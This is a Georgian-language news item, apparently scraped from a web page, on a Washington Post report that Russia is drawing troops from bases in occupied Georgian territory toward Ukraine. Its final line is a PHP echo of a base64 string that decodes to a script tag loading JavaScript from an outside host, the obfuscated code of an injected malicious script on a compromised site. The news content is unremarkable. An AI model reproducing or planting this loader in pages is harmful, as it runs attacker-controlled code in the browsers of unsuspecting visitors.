celsiusi
ავერსი შნაიდერი
გამოცემა The Washington Post პენტაგონის მაღალჩინოსანზე დაყრდნობით წერს, რომ აქვთ მინიშნებები, რომ რუსები სამხედრო ძალებს უკრაინის მიმართულებით საქართველოდანაც იზიდავს (იგულისხმება საქართველოს ოკუპირებული ტერიტორიები) 
 
გამოცემა აშშ-ის თავდაცვის უწყებაზე დაყრდნობით წერს, რომ რუსეთმა უკრაინაში გასაგზავნად სამხედრო ძალების მობილიზება დაიწყო, რადგან მისი დანაკარგები ერთთვიანი ომის შემდეგ გაიზარდა.
 
"გვაქვს მინიშნებები, რომ ისინი ძალებს საქართველოდან იზიდავენ"... "რუსული ბაზები, რომელიც ბაზირებულია საქართველოში. ზუსტი რიცხვი არ ვიცით", - ამბობს თავდაცვის მაღალჩინოსანი. 
 
გამოცემა წერს იმასაც, რომ ათასობით რუსი ჯარისკაცი რეგულარულად დგას სამხედრო პუნქტებში საქართველოდან სირიამდე და ტაჯიკეთამდე, რომლებიც მზად არიან დაუყოვნებლივ განლაგებისთვის. სწორედ ამასთან დაკავშირებით, Washington Post წერს, რომ პენტაგონს სჯერა, რომ კრემლი გეგმავს, შეინარჩუნოს სახმელეთო შეტევა, რადგან რუსი მეთაურები დიდ დანაკარგებს განიცდიან. 
 
968
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");